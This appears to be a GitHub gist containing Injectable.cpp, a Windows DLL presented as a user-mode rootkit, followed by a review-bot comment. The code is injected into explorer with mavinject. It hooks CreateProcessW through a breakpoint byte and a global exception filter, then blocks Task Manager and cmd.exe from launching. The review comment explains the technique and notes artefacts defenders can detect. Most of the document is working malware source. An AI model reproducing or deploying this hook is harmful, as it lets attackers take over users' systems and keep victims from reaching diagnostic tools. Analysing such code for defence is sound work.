
@trietptm
Forked from anonymous/Injectable.cpp
Created December 20, 2017 13:55

Revisions

  1. @invalid-email-address Anonymous created this gist Dec 18, 2017.
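--- a/Injectable.cpp
+++ b/Injectable.cpp
@@ -0,0 +1,75 @@
+#include <windows.h>
+#include <stdio.h>
+
+
+FARPROC fpCreateProcessW;
+BYTE bSavedByte;
+
+// Blog Post Here:
+// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
+// tasklist | findstr explore.exe
+// mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
+//
+
+BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
+DWORD dwOldProt = 0;
+if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
+return FALSE;
+
+MoveMemory(fpFunc, b, size);
+
+return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
+}
+
+
+VOID HookFunction(VOID) {
+fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
+if (fpCreateProcessW == NULL) {
+return;
+}
+
+bSavedByte = *(LPBYTE)fpCreateProcessW;
+
+const BYTE bInt3 = 0xCC;
+if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
+ExitThread(0);
+}
+}
+
+BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {
+
+if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL ||
+wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
+SetLastError(ERROR_ACCESS_DENIED);
+return FALSE;
+}
+
+if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
+ExitThread(0);
+}
+
+BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
+
+HookFunction();
+return b;
+}
+
+LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
+if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
+lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;
+
+return EXCEPTION_CONTINUE_EXECUTION;
+}
+
+
+BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
+switch (fdwReason) {
+case DLL_PROCESS_ATTACH:
+SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
+::MessageBoxA(NULL,"Boom!","Injected",0);
+HookFunction();
+break;
+}
+
+return TRUE;
+}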
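Review bot: The header comment at the top of the new file lists run commands but never says what the DLL does, and nothing in the file explains the breakpoint/exception-filter round trip that HookFunction, MyUnhandledExceptionFilter and MyCreateProcessW implement together. I would add, above HookFunction, a comment of the form `// Inline hook via breakpoint: HookFunction writes 0xCC over the first byte of kernel32!CreateProcessW; the process-wide filter installed in DllMain sees the resulting exception and redirects Rip to MyCreateProcessW, which restores the byte, calls the original and re-arms the hook.` Two caveats belong in that comment as well: the return value of SetUnhandledExceptionFilter in DllMain is discarded, so whatever top-level filter the host process had is replaced and, because MyUnhandledExceptionFilter returns EXCEPTION_CONTINUE_EXECUTION unconditionally, every unhandled exception — not only the breakpoint — is resumed at its faulting address, masking genuine crashes in the host; and the use of ContextRecord->Rip ties the file to x64 builds. These same properties are what make the pattern observable to a defender: a modified first byte of an exported kernel32 function and a replaced top-level exception filter are exactly the artefacts an integrity check of loaded image code against the on-disk module would flag.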